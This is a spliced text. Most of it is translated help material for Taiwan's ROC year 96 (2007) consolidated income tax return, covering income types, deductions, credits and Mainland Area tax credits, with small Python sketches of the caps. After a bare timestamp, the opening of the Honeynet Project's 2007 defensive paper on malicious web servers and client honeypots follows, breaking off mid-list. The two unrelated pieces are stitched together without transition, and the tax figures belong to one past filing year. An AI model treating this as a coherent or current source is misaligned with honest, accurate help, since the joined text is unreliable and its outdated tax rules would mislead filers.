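The total profit distributable each year to a partner in a partnership, or the total profit earned each year by the owner of a sole proprietorship from the business. (Fill in according to the schedule of investors and profit distribution of the profit-seeking enterprise, and attach the filed and received copy of that schedule together with proof of payment of the profit-seeking enterprise income tax.)
Profits from an individual's occasional trading.
The par value (or par value plus the imputation tax credit included) of newly issued registered shares that qualify for deferred taxation on capitalized earnings (Article 16 and the latter part of Article 17 of the Statute for Upgrading Industries before its amendment on December 31, ROC year 88, and Article 13 of the Statute for Encouragement of Investment), at the time they are transferred, given as a gift, or distributed as part of an estate; where the actual transfer price is lower than par value, the transfer price (or the transfer price plus the imputation tax credit included) is used instead. (Fill in according to the deferred-tax share transfer income statement.)
※ Where dividend income includes dividends distributed on borrowed securities: if the borrower still held the borrowed securities across the ex-rights or ex-dividend record date and has since returned the dividends received to the lender, that portion of the dividends is excluded from the borrower's total consolidated income, and the imputation tax credit it carries may not be used to offset the borrower's tax payable. When the borrower claims this exclusion, fill in according to the special statement for entitlement compensation in securities lending transactions.

What is income from professional practice?
The business or performance income of lawyers, accountants, architects, professional engineers, physicians, pharmacists, midwives, authors, brokers, land scriveners, craftsmen, performers, and others who make a living independently by their skills, less necessary expenses or costs (please attach a schedule of receipts and an income statement for review by the tax authority. Where a practitioner has not filed a return as required by law, has not kept books and retained vouchers as required, or cannot provide books and documents proving the amount of income, the tax authority may assess the income from the information it has found or from the standards issued by the Ministry of Finance).
Where an individual's income from manuscript fees, publication royalties, musical scores, compositions, scripts, comics, and hourly lecture fees totals no more than NT$180,000 for the year, the full amount may be deducted; where it exceeds that limit, the excess, less costs and necessary expenses, is reported as income from professional practice.
What is salary income?
All income received for duties or work, including salaries, stipends, wages, allowances, annual remuneration, bonuses, profit-sharing, subsidies of all kinds, and other payments (such as transportation allowances).

What is interest income?
Interest received on government bonds (including bonds, treasury bills, securities, and certificates issued by any level of government), corporate bonds, financial debentures, short-term bills of all kinds, deposits at financial institutions (including preferential-rate deposits of retirement pay for civil servants, teachers, military and police personnel), and other sums lent out, as well as prizes won on savings-type lottery bonds whose principal is repaid at maturity. Interest income on government bonds, corporate bonds, and financial debentures held by individuals, interest income on the portion of a short-term bill's redemption amount at maturity that exceeds its initial issue price, and interest income distributed on beneficiary securities or asset-backed securities that are taxed separately under the Financial Asset Securitization Act or the Real Estate Securitization Act are not included in total consolidated income; that is, they need not be reported, and the tax already withheld may neither offset tax payable nor be claimed as a refund.

What are rental income and royalty income?
Rental income
Rental income means the following receipts, less reasonable and necessary depreciation and expenses:
Rent received from leasing property.
Income generated by putting to use the dian price received when property is placed under dian (a traditional usufructuary pledge).
All income received from creating a fixed-term right of permanent tenancy or a superficies.
Deposits or similar sums received on leased property, or the dian price received for property placed under dian, are counted as rental revenue calculated at an annual interest rate of 2.175%.
Necessary depreciation and expenses (such as the depreciation, repairs, land value tax, house tax, premiums for insurance covering the leased property, and interest on loans from financial institutions used to buy the leased house, as listed in Schedule 1 of the return) may be itemized with proof. If they are not itemized with proof, the standard for necessary expenses this year is 43% of rental revenue. Revenue from leasing land, however, may be reduced only by the land value tax paid on that land for the year, and not by the 43% allowance for necessary depreciation and expenses.
Where property is lent free of charge to another person for use in a business or professional practice, rental revenue must be computed according to prevailing local rents.
Where property is lent free of charge to an individual other than the taxpayer, spouse, or lineal relatives, and is not used for a business or professional practice, rental revenue must be computed according to prevailing local rents unless a gratuitous loan contract can be produced for verification (it must be attested as genuinely gratuitous by two persons other than the parties and notarized under the Notary Act).
Where the rent reported for leased property is clearly lower than prevailing local rents, the tax authority may adjust and compute rental revenue by reference to prevailing local rents.
The house tax registration number required when reporting rental income should be copied from the "tax registration number" on the house tax bill for that property, e.g. A01237654321.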
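The rental rules above reduce to a small calculation, sketched here in Python. The function name and sample amounts are hypothetical. The sketch assumes that the 43% standard applies to the imputed deposit revenue as well as to the rent, which the text does not spell out, and it does not cover leased land, where only the land value tax may be subtracted.

```python
from decimal import Decimal

DEPOSIT_RATE = Decimal("0.02175")       # imputed annual rate on deposits
STANDARD_EXPENSE_RATE = Decimal("0.43")  # standard necessary expenses


def rental_income(annual_rent, deposit=0, itemized_expenses=None):
    """Rental revenue (rent plus imputed deposit revenue) less expenses."""
    revenue = Decimal(annual_rent) + Decimal(deposit) * DEPOSIT_RATE
    if itemized_expenses is None:
        expenses = revenue * STANDARD_EXPENSE_RATE  # no itemized proof
    else:
        expenses = Decimal(itemized_expenses)       # itemized with proof
    return revenue - expenses


# Hypothetical case: NT$240,000 rent for the year and a NT$40,000 deposit.
print(rental_income(240_000, 40_000))
```

Decimal is used instead of float so that the 2.175% rate does not introduce rounding noise.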
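Royalty income means:
Royalties received for allowing others to use patents, trademarks, copyrights, secret processes, and licensed rights of all kinds, less reasonable and necessary depreciation and expenses (proof required).

What is income from self-employed farming, fishing, animal husbandry, forestry, and mining?
All receipts obtained by engaging with one's own labor in farming, fishing, animal husbandry, forestry, mining, and the like, less necessary expenses.

What is property transaction income?
Income obtained from the sale or exchange of property and rights, including:

(1) Property and rights acquired for consideration: the transaction price at the time of the transaction, less the original acquisition cost and all improvement costs.
(2) Property and rights acquired by inheritance or gift: the transaction price at the time of the transaction, less the prevailing value of the property or right at the time of inheritance or gift and all improvement costs incurred after the inheritance or gift.

However, income from the sale of land, and of clothing and furniture in everyday household use, is tax-exempt by law. Income from the sale or exchange of a house belongs to the year in which the registration of transfer of ownership is completed; for an auctioned house, it belongs to the year in which the buyer receives the certificate of transfer of rights issued by the enforcement court.

Note: Where an individual sells a house and land, and the original acquisition cost and sale price are verified by the tax authority from the attached private contract and payment records, the court's auction award notice, or other supporting documents, but the prices of the house and the land were not separated, or were separated only for the purchase or only for the sale, the property transaction income for the house is computed by taking the difference between the total purchase price and the total sale price of the house and land and applying the ratio of the house's assessed present value at the time of sale to the sum of the land's announced present value and the house's assessed present value.

What are prizes or awards from contests, competitions, and games of chance?
Prizes or awards from taking part in contests and competitions or from games of chance; the necessary expenses or costs paid may be deducted. Prizes from government-run lotteries, such as uniform invoice and Public Welfare Lottery prizes (pink withholding/non-withholding statement), are subject only to withholding and are not included in total consolidated income; that is, they need not be reported, and the tax already withheld may neither offset tax payable nor be claimed as a refund.

What is retirement income?
Income such as pensions, severance pay, retirement pay, separation pay, lifetime pensions, and old-age benefits other than insurance payments received by an individual, excluding the contributions the individual paid over the years out of salary income and the yield on them.

What is other income?
Income other than items (2) through (10) above, computed as the receipts less the costs and necessary expenses paid to obtain them (receipts or supporting documents must be attached). Welfare payments issued by an employee welfare committee, however, have no costs or necessary expenses to deduct.

What is variable income?
Income from self-operated forestry (classed as self-employed farming income); remuneration of those employed in deep-sea fishing that is distributed in a lump sum after each voyage rather than drawn monthly (classed as salary income); and land price compensation received under Article 77 or Article 11 of the Equalization of Land Rights Act when farmland is taken back by the lessor or expropriated by the government (classed as other income).
The portion exceeding the fixed tax-exempt amount when a lump-sum survivors' pension or death compensation, received by the survivors under laws or regulations upon the death of an individual other than in the line of duty, is combined with retirement income (classed as other income).
For each of the variable income items above, only half of the income need be entered in the total column for its category when computing the year's income.
Please report each item of your income separately.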

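Deductions

Deductions maintenance.
What are deductions?

Deductions comprise the general deduction and special deductions.

General deduction: either the standard deduction or itemized deductions. One of the two must be chosen, and they may not be combined. A taxpayer who has elected the standard deduction, who is deemed under the rules to have elected it by neither listing itemized deductions nor electing the standard deduction, or who did not file a final return may not, once the tax authority has made its assessment, request a change to itemized deductions.
Standard deduction: NT$46,000 for a single filer; NT$92,000 for a married couple filing jointly.
Itemized deductions: see Itemized deductions.
Special deductions:
Special deduction for salary income: each person with salary income, among the taxpayer and the individuals filing jointly, may deduct NT$78,000. Where salary income for the year is below NT$78,000, only the full amount of that salary income may be deducted.
Deduction for losses from property transactions: losses from property transactions of the taxpayer, spouse, and claimed dependents (documents evidencing the loss must be attached). The deduction for each year may not exceed the property transaction income reported for that year. Where there is no property transaction income in the year to offset, or it is insufficient, the loss may be deducted from property transaction income of the following 3 years. For how to compute the loss, refer to: Income data (8), computation of property transaction income.
Special deduction for savings and investment: interest on deposits with financial institutions, income from savings-type trust funds (withholding statement format code 5A), and business-profit income arising when registered tax-deferred shares of publicly issued and listed companies acquired on or before December 31 of ROC year 87 (1998) are transferred, given as gifts, distributed as part of an estate, withdrawn from tax deferral, or deposited with the central securities depository (reporting statement format code 71M for income from the transfer of tax-deferred shares), received by the taxpayer and by the spouse and dependents filing jointly. Where the total for the year does not exceed NT$270,000, it may be deducted in full; where it exceeds NT$270,000, the deduction is limited to NT$270,000. This excludes passbook savings interest exempt under the Postal Remittances and Savings Act; interest on government bonds, corporate bonds, financial debentures, and short-term bills taxed separately under the Income Tax Act; and interest on beneficiary securities or asset-backed securities taxed separately under the Financial Asset Securitization Act or the Real Estate Securitization Act.
Special deduction for the disabled: NT$77,000 per person for the taxpayer, spouse, and claimed dependents who are disabled (a copy of the disability handbook must be attached) or who are patients as defined in Article 5, paragraph 2 of the Mental Health Act (a copy of a specialist physician's certificate of diagnosis as a severely ill patient must be attached; a catastrophic illness card may not be substituted).
Special deduction for tuition: tuition for the taxpayer's claimed dependent children attending colleges or universities whose academic credentials are recognized by the Ministry of Education (copies of payment receipts or supporting documents must be attached). Each filing household may deduct NT$25,000 per year, or the actual amount if it is less than NT$25,000. Where a government subsidy or scholarship has been received, the amount remaining after subtracting that subsidy or scholarship is claimed within the above limit. This deduction does not apply to students at the open university, open junior colleges, or the first 3 years of a five-year junior college.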
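The caps on the special deductions above amount to a handful of min() operations. The sketch below is a simplified illustration, with hypothetical function names and amounts in NT$; it ignores the eligibility and documentation conditions.

```python
SALARY_DEDUCTION_CAP = 78_000    # per person with salary income
SAVINGS_DEDUCTION_CAP = 270_000  # per filing household
TUITION_DEDUCTION_CAP = 25_000   # per filing household


def salary_deduction(salary_income):
    # Salary below the cap is deducted in full; otherwise the cap applies.
    return min(salary_income, SALARY_DEDUCTION_CAP)


def savings_investment_deduction(qualifying_income):
    # Qualifying interest and related income, capped at NT$270,000.
    return min(qualifying_income, SAVINGS_DEDUCTION_CAP)


def tuition_deduction(tuition_paid, subsidy=0):
    # Subsidies and scholarships are subtracted before the cap is applied.
    return min(max(tuition_paid - subsidy, 0), TUITION_DEDUCTION_CAP)


def property_loss_deduction(loss, gain):
    # The loss offsets this year's property transaction income only;
    # the unused part may be carried to the following 3 years.
    used = min(loss, gain)
    return used, loss - used
```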

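Itemized deductions

Itemized deduction data maintenance.
What are itemized deductions?

The following expenses may be claimed as deductions to the extent that they are supported by reliable evidence or receipts and do not exceed the statutory limits.

Donations:
Donations to legal persons organized as public-interest associations or foundations under the General Principles of the Civil Code, or to educational, cultural, public welfare, or charitable institutions or groups registered or established with the competent authority under other relevant laws, and property used to establish, donated to, or added to a qualifying public-interest trust, are limited to 20% of gross consolidated income. Donations for national defense and troop support, contributions to the government, and sponsorships under the Cultural Heritage Preservation Act to fund the maintenance or restoration of historic sites, buildings within historic site preservation zones, and historic buildings are not subject to a ceiling. The original receipt must be attached for review. For donations of purchased land, or of columbarium (ash or bone storage) facilities established in accordance with the Mortuary Service Administration Act, attach: A. the document issued by the recipient agency, institution, or group acknowledging receipt of the donation; B. the sale contract and proof of payment for the donated land or facility, or other sufficient supporting documents. For donations of shares of unlisted (non-OTC) companies made on or after July 8 of ROC year 94 (2005), obtain from the recipient a receipt or supporting document stating the sale proceeds of the shares in ROC year 96 (2007).

Insurance premiums:
Premiums for personal insurance (including life, health, accident, and annuity insurance) of the taxpayer, spouse, and claimed lineal dependents (including labor insurance, employment insurance, insurance for military personnel, civil servants, and teachers, farmers' insurance, and student accident insurance). The insured and the policyholder must be in the same filing household. NT$24,000 may be deducted per person per year; where the premiums actually paid are less than NT$24,000, the actual amount is deducted in full. National Health Insurance premiums for the taxpayer, spouse, and claimed lineal dependents, when paid by the taxpayer, the jointly filing spouse, or a dependent, are deductible in full without a ceiling. The original receipt or the original premium payment certificate must be attached; for employee premiums remitted collectively by an agency or enterprise (the portion borne by the employee), attach a certificate issued by the employer.

Medical and maternity expenses:
Medical and maternity expenses of the taxpayer, spouse, and claimed dependents, limited to amounts paid to public hospitals, hospitals contracted under civil servants' insurance, medical institutions contracted under labor insurance, hospitals and clinics contracted under National Health Insurance, or hospitals whose accounting records the Ministry of Finance has recognized as complete and accurate. The portion covered by insurance benefits is not deductible. Original receipts bearing the payer's name must be attached; where a receipt has been submitted to the employer to claim a subsidy, attach a copy of the receipt certified by the employer.

Disaster losses:
Losses suffered by the taxpayer, spouse, and claimed dependents from force majeure disasters such as earthquake, windstorm, flood, drought, or fire. The portion covered by insurance compensation or relief payments is not deductible. Attach the disaster loss certificate issued by the tax authority (a branch, office, or service center of the National Taxation Bureau) after its post-disaster investigation.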

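Interest on a loan to purchase a self-use residence:
Interest paid (ZK) on a loan taken out from a financial institution by the taxpayer to purchase a self-use residence must meet all of the following conditions:
The house is registered in the name of the taxpayer, spouse, or a dependent.
The taxpayer, spouse, or a dependent completed household registration at that address in ROC year 96 (2007) (evidenced by a copy of the household registration booklet), and the house is not leased out or used by a business or professional practitioner.
Original interest receipts for the loan paid in ROC year 96 (2007) have been obtained.
For a self-use residence owned by the spouse, interest paid on a loan taken out by the taxpayer from a financial institution may be claimed only if the taxpayer and the spouse are in the same filing household.
Where houses with two street numbers have been joined into one, only one of them may be claimed.
The deduction is limited to one house per filing household and equals the interest actually paid in the year less the special deduction for savings and investment (ZD). The annual deduction may not exceed NT$300,000, that is, 0 ≤ ZK − ZD ≤ 300,000.
If the interest receipt does not state the location of the house, the owner, the date ownership was acquired, the borrower's name, or the purpose of the loan, the taxpayer must add the missing details and sign or seal them, and present copies of the building ownership certificate and household registration data.
Interest on loans taken out as "home repair loans" or "consumer loans" may not be claimed. If the loan was in fact used to purchase a self-use residence and supporting documents such as the ownership certificate or a transcript of the building register can be presented, it may still be claimed. Where the lending bank has changed or the loan contract has been replaced, only interest paid within the outstanding balance of the original purchase loan may be claimed, and copies of documents evidencing the refinancing must be presented for review, such as the certificate of the original loan balance, the payoff certificate, or a handwritten transcript of the building register together with the building change list or building index (covering both before and after the refinancing or contract change).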
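The limit 0 ≤ ZK − ZD ≤ 300,000 is a clamp on the difference between interest paid and the savings and investment special deduction. A minimal sketch, with a hypothetical function name and amounts in NT$:

```python
MORTGAGE_INTEREST_CAP = 300_000


def mortgage_interest_deduction(zk, zd):
    """zk: interest actually paid; zd: savings and investment special deduction."""
    # The deduction can neither be negative nor exceed NT$300,000.
    return min(max(zk - zd, 0), MORTGAGE_INTEREST_CAP)
```

If the savings and investment deduction already exceeds the interest paid, nothing remains to deduct.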
　

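Rent paid for housing:
Rent paid by the taxpayer, spouse, and claimed lineal dependents for a dwelling within the Republic of China that is rented as their own residence and not used for business or professional practice. The deduction is limited to NT$120,000 per filing household per year. It may not be claimed if mortgage interest is claimed. Attach: A. a copy of the lease and of proof of rent payment (e.g. receipts signed by the lessor, ATM transfer records, or remittance certificates); B. proof that the taxpayer, spouse, or a claimed lineal dependent completed household registration at the rented address in the tax year, or an affidavit by the taxpayer stating that the rented dwelling was used as a residence and not for business or professional practice during the tax year.

Donations under the Political Donations Act:
Under the Political Donations Act, an individual's donations to the same prospective candidate may not exceed NT$100,000 per year, and each filing household's total deduction per year for donations to political parties, political groups, and prospective candidates may not exceed 20% of the gross consolidated income reported by that household for the year, nor exceed NT$200,000. Donations to a person who has not lawfully registered as a candidate or whose candidacy was revoked after registration, and donations supported by receipts in a nonconforming format, are not recognized.
Donations to a political party are not recognized if the party's nominated candidates received an average of less than 2% of the vote in the ROC year 93 (2004) legislative election, or if the receipt is in a nonconforming format. (No legislative election was held in ROC year 96 (2007), so the results of the previous election, in ROC year 93, apply; the parties that reached 2% were the Kuomintang, the Democratic Progressive Party, the People First Party, the Taiwan Solidarity Union, and the Non-Partisan Solidarity Union.)

Campaign expenses under the Civil Servants Election and Recall Act:
Campaign expenses related to campaign activities that a candidate pays from the date of the election announcement until 30 days after polling day may be claimed as a deduction, within the prescribed ceiling and net of donations received. Documents to attach: A. Candidates who opened a dedicated political donations account to receive donations: a copy of the accounting report filed with the Control Yuan and the prospective candidate's statement of political donation receipts and expenditures as reviewed by the Control Yuan. B. Candidates who did not open such an account: an itemization of campaign expenses by the categories in Article 18, paragraph 3, subparagraph 2 of the Political Donations Act, with vouchers or supporting documents for the expenditures. (Campaign expenses of candidates for the 7th Legislative Yuan are to be itemized, under Article 42 of the Civil Servants Election and Recall Act as amended and promulgated on November 7 of ROC year 96 (2007), in the consolidated income tax return for ROC year 97 (2008, the year of polling day) filed in ROC year 98 (2009).)

Donations under Article 51 of the Private School Act:
Donations by individuals to private schools made through the Private School Development Foundation (財團法人私立學校興學基金會) may not exceed 50% of gross consolidated income; the original receipt must be attached for review.
The amounts actually paid or lost as described above are called the "amount actually incurred", but not all of it is necessarily deductible. For example, amounts lacking reliable evidence or receipts, and amounts that exceed the prescribed proportion even though evidence and receipts are complete, are not deductible. What remains after subtracting these non-deductible amounts is the "amount deductible by law".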

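Investment tax credit

Investment tax credit maintenance.
What is the investment tax credit? (An investment tax credit certificate or balance statement must be attached.)

Under Article 8 of the Statute for Upgrading Industries as it stood before the amendment of December 31 of ROC year 88 (1999), and Article 33 of the Statute for Encouragement of Private Participation in Transportation Infrastructure Projects, an individual who, as an original subscriber, subscribed to registered shares issued on incorporation or expansion by a government-designated important technology enterprise, important investment enterprise, venture capital enterprise, or private institution participating in transportation infrastructure, and has held them for 2 years or more, may credit up to 20% of the price paid for the shares against consolidated income tax payable (AF) for the year. Where the credit cannot be fully used in the year, it may be used in the following 4 years. For investments in a venture capital enterprise, the credit may not exceed the amount corresponding to the ratio of that enterprise's actual investment in technology enterprises to its paid-in capital.

Under Article 8 of the Statute for Upgrading Industries as amended on December 31 of ROC year 88 (1999), an individual who, as an original subscriber, subscribed to registered shares issued by an emerging important strategic industry and has held them for 3 years or more may credit an amount, up to the price paid multiplied by the prescribed credit rate, against consolidated income tax payable (AF) over the 5 years starting with the current year.

The total credit in any one year may not exceed 50% of the consolidated income tax payable (AF) for that year, except in the final year.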
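The yearly 50% ceiling can be illustrated as follows. This is a sketch under assumptions: the function name is hypothetical, amounts are in NT$, and it assumes that in the final year the credit is still limited to the tax payable (AF) itself.

```python
def investment_credit_used(available_credit, tax_payable, final_year=False):
    """Return (credit used this year, credit left over)."""
    # Outside the final year, at most 50% of tax payable (AF) may be credited.
    cap = tax_payable if final_year else tax_payable * 0.5
    used = min(available_credit, cap)
    return used, available_credit - used
```

With NT$100,000 of credit and NT$60,000 of tax payable, NT$30,000 is used in an ordinary year and the rest is carried forward.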

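Repurchase of a self-use residence

Repurchase of self-use residence maintenance.
What is the tax credit for repurchasing a self-use residence?

Where a taxpayer sells a self-use residential house and, within 2 years from the date the transfer was registered, purchases another self-use residential house at a price exceeding the original sale price, the income tax paid on the property transaction income from the sale may be credited against, or refunded from, income tax payable for the year in which the transfer of the repurchased house is registered. This does not apply to the portion of the original property transaction income that has already been offset against property transaction losses. The rule also applies where the purchase precedes the sale.
A self-use residential house is one at which the owner, spouse, or a claimed lineal dependent has completed household registration and which was not leased out or used for business in the year before the sale. Copies of the household registration booklet for the years of sale and repurchase must be attached.
Attach the sale contracts for the repurchased and the sold house (a copy of the contract filed with the land office for registration of transfer and bearing its receipt stamp may be substituted) and copies of the ownership certificates, to show that the repurchase price is higher than the sale price and that the registrations are no more than two years apart. File these, together with the final consolidated income tax return for the year in which the credit or refund is claimed, with the tax authority for the place of household registration (a branch or office of the National Taxation Bureau).
The consolidated income tax eligible for credit or refund is the increase in consolidated income tax that resulted from including the property transaction income when the tax for the year of sale (the year in which the transfer of ownership was registered) was finally determined.
The year in which the credit or refund is claimed is, where the sale precedes the purchase, the year in which transfer of the repurchased house is registered; where the purchase precedes the sale, the year in which transfer of the sold house is registered.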

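Credit for income tax paid in the Mainland Area

Notes on reporting the creditable tax, exemptions, and deductions for income sourced in the Mainland Area:

A filer with income sourced in the Mainland Area should enter the name of the place where the income arose, together with income sourced in the Taiwan Area, on the income data page. Then enter total Mainland Area income in item (A) on this page and the tax payable excluding Mainland Area income in item (C); the system computes item (D), the tax payable on Mainland Area income. Enter the income tax already paid in the Mainland Area in item (E), and the system computes item (F), the creditable tax. Note: if you have no Mainland Area income, leave this page blank. The relevant rules are as follows:

Income sourced in the Mainland Area must be listed in detail, with the name and address of the place where it arose and the amount, and is taxed together with Taiwan Area income.
Income tax already paid in the Mainland Area (withheld or self-paid) may be credited against tax payable. The credit may not exceed the increase in tax payable, computed at the applicable rate, that results from including the Mainland Area income. Attach the Mainland Area tax payment certificate, first authenticated by the institution established or designated by the Executive Yuan or the private organization it has commissioned (currently the Straits Exchange Foundation), for the tax authority's review.
To claim exemptions for a spouse or dependents in the Mainland Area, attach a copy of the resident identity card and proof of the family relationship for the year. For claimed children or siblings who are aged 20 or over and still in school, physically or mentally disabled, or unable to earn a living, also attach proof of enrollment or of physical disability, mental disorder, intellectual disability, serious illness, or the like. For deductions, attach sufficient supporting documents. These supporting documents are notarial certificates issued by a Mainland Area notary office; the taxpayer must obtain the certificates relating to each income year and have them authenticated by the institution established or designated by the Executive Yuan or the private organization it has commissioned (currently the Straits Exchange Foundation) before submitting them for the tax authority's review.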
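The relationship between items (C), (D), (E), and (F) can be sketched as below. The function and parameter names are hypothetical, and the tax payable including Mainland Area income is taken as a given input rather than computed from rate tables.

```python
def mainland_tax_credit(tax_with_mainland, tax_without_mainland, tax_paid_mainland):
    """Return (item D, item F) from total tax, item (C), and item (E)."""
    # Item (D): extra tax payable caused by including Mainland Area income.
    d = max(tax_with_mainland - tax_without_mainland, 0)
    # Item (F): the credit is the tax paid in the Mainland Area, capped at (D).
    f = min(tax_paid_mainland, d)
    return d, f
```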

20080116

4:18:00 PM

Know Your Enemy:
Malicious Web Servers

The Honeynet Project
http://www.honeynet.org

Christian Seifert – The New Zealand Honeynet Project
Ramon Steenson – The New Zealand Honeynet Project
Thorsten Holz – The German Honeynet Project
Bing Yuan – The German Honeynet Project
Michael A. Davis – The Honeynet Project

Last Modified:9 August 2007

INTRODUCTION

Today, many attackers are part of organized crime with the intent to defraud their victims. Their goal is to deploy malware on a victim's machine and to start collecting sensitive data, such as online account credentials and credit card numbers. Since attackers have a tendency to take the path of least resistance and many traditional attack paths are barred by a basic set of security measures, such as firewalls or anti-virus engines, the "black hats" are turning to easier, unprotected attack paths to place their malware onto the end user's machine. They are turning to client-side attacks.

In this paper, we examine these client-side attacks and evaluate methods to defend against client-side attacks on web browsers. First, we provide an overview of client-side attacks and introduce the honeypot technology that allows security researchers to detect and examine these attacks. We then proceed to examine a number of cases in which malicious web servers on the Internet were identified with our client honeypot technology and evaluate different defense methods. We conclude with a set of recommendations that one can implement to make web browsing safer.

In addition to the findings in this paper, we make the tools and data freely available on our web site (http://www.nz-honeynet.org/capture.html and http://www.nz-honeynet.org/kye/mws/complete_data_set.zip). We hope that these tools and the data enable the security community to easily become involved in studying the phenomenon of malicious servers. In the section "Future Work", we list some research opportunities that we see in this field.

CLIENT-SIDE ATTACKS

In order to understand client-side attacks, let us briefly describe server-side attacks that we can contrast to client-side attacks. Servers expose services that clients can interact with. These services are accessible to clients that would like to make use of these services. As a server exposes services, it exposes potential vulnerabilities that can be attacked. Merely running a server puts oneself at risk, because a hacker can initiate an attack on the server at any time. For example, an attacker could send a maliciously crafted HTTP request to a vulnerable web server and attempt to leverage errors or other unexpected application behavior.

Client-side attacks are quite different. These are attacks that target vulnerabilities in client applications that interact with a malicious server or process malicious data. Here, the client initiates the connection that could result in an attack. If a client does not interact with a server, it is not at risk, because it doesn't process any potentially harmful data sent from the server. Merely running an FTP client without connecting to an FTP server, for example, would not allow for a client-side attack to take place. However, simply starting up an instant messaging application potentially exposes the client to such attacks, because clients are usually configured to automatically log into a remote server.

A typical example of a client-side attack is a malicious web page targeting a specific browser vulnerability that, if the attack is successful, would give the malicious server complete control of the client system. Client-side attacks are not limited to the web setting, but can occur on any client/server pair, for example e-mail, FTP, instant messaging, multimedia streaming, etc. Client-side attacks currently represent an easy attack vector because most attention in protection technology has been focused on the protection of exposed servers from remote attackers. Clients are only protected in environments where access from internal clients to servers on the Internet is restricted via traditional defenses like firewalls or proxies. However, a firewall, unless combined with other technologies such as IPS, only restricts network traffic; once the traffic is permitted, a client interacting with a server is at risk. More advanced corporate server filtering solutions are available, but typically these only protect a limited set of client technologies.

Figure 1 - Traditional server honeypot being attacked by a "black-hat"

Figure 2 - Client honeypot

SERVER HONEYPOTS VS. CLIENT HONEYPOTS

Traditional honeypot technology is server based and not able to detect client-side attacks. A low interaction honeypot like Honeyd, or a high interaction honeynet system with the Roo Honeywall, acts as a server, exposing some vulnerable services and passively waiting to be attacked (Figure 1). However, to detect a client-side attack, a system needs to actively interact with the server or process malicious data. A new type of honeypot is therefore needed: the client honeypot. Client honeypots crawl the network, interact with servers, and classify servers with respect to their malicious nature (Figure 2).

The main differences between a client-side honeypot and traditional honeypot are:

client-side: it simulates/drives client-side software and does not expose server based services to be attacked.
active: it cannot lure attacks to itself, but rather it must actively interact with remote servers to be attacked.
identify: whereas all accesses to the traditional honeypot are malicious, the client-side honeypot must discern which server is malicious and which is benign.

Similarly to traditional server honeypots, there are two types of client honeypots: low and high interaction client honeypots. The low interaction client honeypot uses a simulated client (for example HoneyC or wget in the case of a browser-based client honeypot), interacts with servers, and classifies the servers based on some established definition of "malicious" activity. Usually this is performed via static analysis and signature matching. Low interaction client honeypots have the benefit of being quite fast, but can produce false alerts or miss a malicious server, especially since they do not act like a "real" client and have programmatic limitations. They may also fail to fully emulate all vulnerabilities in a client application. The other type of client honeypot, the high interaction client honeypot, takes a different approach to make a classification of malicious activity. Using a dedicated operating system, it drives an actual vulnerable client to interact with potentially malicious servers. After each interaction, it checks the operating system for unauthorized state changes. If any of these state changes are detected, the server is classified as malicious. Since no signatures are used, high interaction client honeypots are able to detect unknown attacks.

In this paper, we are looking at malicious web servers that attack web browsers. Attacks on web browsers by malicious web servers seem to be the most prominent client-side attack type today, but they are still not well understood. The goal of our work is to assess the threat to web browser client applications from malicious web servers with a high interaction client honeypot. We chose to use a high interaction client honeypot, because it allows us to obtain information about attacks that are unknown or obfuscated in a way that low interaction client honeypots could not detect. We obtain and present information on malicious web servers, evaluate several defense mechanisms, and make recommendations on how to protect systems against these malicious web servers.

IDENTIFICATION OF MALICIOUS WEB SERVERS

We identified malicious web servers with the high interaction client honeypot Capture-HPC. Capture-HPC is an open source client honeypot developed by Victoria University of Wellington in conjunction with the New Zealand Honeynet Project. This high interaction client honeypot monitors the system at various levels:

registry modifications to detect modification of the Windows registry, like new or modified keys
file system modifications to detect changes to the file system, like created or deleted files, and
creation/destruction of processes to detect changes in the process structure.

Client honeypot instances are run within a VMware virtual machine. If unauthorized state changes are detected - in other words when a malicious server is encountered - the event is recorded and the virtual machine is reset to a clean state before interacting with the next server. (Appendix A contains download details as well as a detailed description of the tool's functionality and underlying technical aspects).
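The classification idea, where any state change that is not on an authorized list marks the server as malicious, can be sketched with a simple before/after comparison. This is not Capture-HPC's implementation; the function names, the snapshot representation, and the example paths in the comments are hypothetical.

```python
from fnmatch import fnmatch


def unauthorized_changes(before, after, authorized_patterns):
    """Return state items that appeared or disappeared and are not authorized.

    before/after: sets of observed items, e.g. file paths, registry keys,
    or process names, captured around one visit to a URL.
    authorized_patterns: glob patterns for expected changes, such as
    "*/Temporary Internet Files/*" for browser cache writes.
    """
    changed = before ^ after  # items created or deleted during the visit
    return {item for item in changed
            if not any(fnmatch(item, pattern) for pattern in authorized_patterns)}


def classify(before, after, authorized_patterns):
    # Any remaining change counts as evidence of a successful attack.
    return "malicious" if unauthorized_changes(before, after, authorized_patterns) else "benign"
```

A visit that only writes to the browser cache would be classified as benign, while one that also drops an executable elsewhere would be classified as malicious.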

With our focus on unauthorized state changes to identify a malicious server, we are narrowing our view to a particular type of malicious server: the ones that can alter the state of the client without user consent or interaction, which usually means that the server is able to control and install malware on the client machine without the user noticing such actions. These attacks are commonly referred to as drive-by-downloads. Many more types of malicious web servers do exist, which we excluded from this initial study. Some examples are phishing servers that try to obtain user sensitive data by imitating a legitimate site or transparent proxy, web servers that specialize in obtaining sensitive files, such as the browser history, from the client machines, and web servers that simply host malicious executables (that need to be explicitly downloaded and executed by a user). Capture-HPC is not suitable for detecting these types of malicious web servers. Rather, we concentrate on powerful malicious servers that take control of the client machine.

We collected our data in the first half of May 2007 using twelve virtual machine instances of Capture-HPC. These instances were connected to the security lab at Victoria University of Wellington, NZ, from which they had direct access to the Internet. No content filtering or firewalling was performed between the security lab and the Internet. Twelve instances of Windows XP SP2 with Capture-HPC V1.1 and Internet Explorer 6 SP2 were installed to interact with a list of web servers. The client honeypot instances were configured to ignore authorized state changes, such as write activity within the browser cache (the complete list of authorized events is included in our downloadable data set which is available at http://www.nz-honeynet.org/kye/mws/complete_data_set.zip). Besides the Softperfect Personal Firewall, which was configured to block any non-web related traffic and prevent potential malware from spreading, we did not install any additional patches, software or plug-ins, nor did we modify the configuration of the operating system or browser in any way to make it less secure, but rather we used the default settings from a routine installation of Windows XP SP2. We suspected that this configuration would solicit a high number of attacks, since many remote execution vulnerabilities, which enable a server to execute code on the client machine, are known and the corresponding exploits are publicly available. The intent was to gather a comprehensive data set of malicious URLs, some of which we would analyze in-depth.

We were not only interested in analyzing attacks in-depth, but also in gaining a general understanding about the risk of accessing the web with such a configuration, and learning whether there are areas of the Internet that are more risky than others. As a result, we categorized the web servers' URLs prior to inspection by our client honeypot. The following categories were used:

Content areas: These URLs point to content of a specific type or topic. They were obtained by issuing keywords of the specific content area to the Yahoo! Search Engine. Five different content areas were inspected:

Adult – pages that contain adult entertainment/pornographic material
Music – pages that contain information about popular artists and bands
News – pages that contain current news items or news stories in sports, politics, business, technology, and entertainment
